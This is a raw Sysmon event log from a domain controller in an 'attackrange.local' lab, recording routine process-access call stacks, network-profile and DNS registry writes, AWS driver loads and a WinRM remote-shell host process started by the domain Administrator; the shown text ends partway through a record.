13:53:45.320{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.304{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.304{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.304{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 13241300x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 13241300x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{46cd6ec6-31c9-4591-81f1-8238d3d3f021}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{46cd6ec6-31c9-4591-81f1-8238d3d3f021}\LastProbeTimeDWORD (0x5fcf8569) 13241300x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\DateLastConnectedBinary Data 13241300x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\NameTypeDWORD (0x00000006) 13241300x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\DateCreatedBinary Data 13241300x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\CategoryDWORD (0x00000002) 13241300x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\ManagedDWORD (0x00000001) 13241300x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\Descriptionattackrange.local 13241300x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.304{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{46CD6EC6-31C9-4591-81F1-8238D3D3F021}\ProfileNameattackrange.local 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.304{10ACEC4A-8569-5FCF-8100-000000009101}41644184C:\Windows\system32\conhost.exe{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8569-5FCF-8100-000000009101}4164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.288{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.293{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-855F-5FCF-21ED-040000000000}0x4ed210HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.273{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.368C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 644600x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.665C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 13241300x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.273{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 10341000x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.273{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.273{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.273{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 13241300x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.257{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 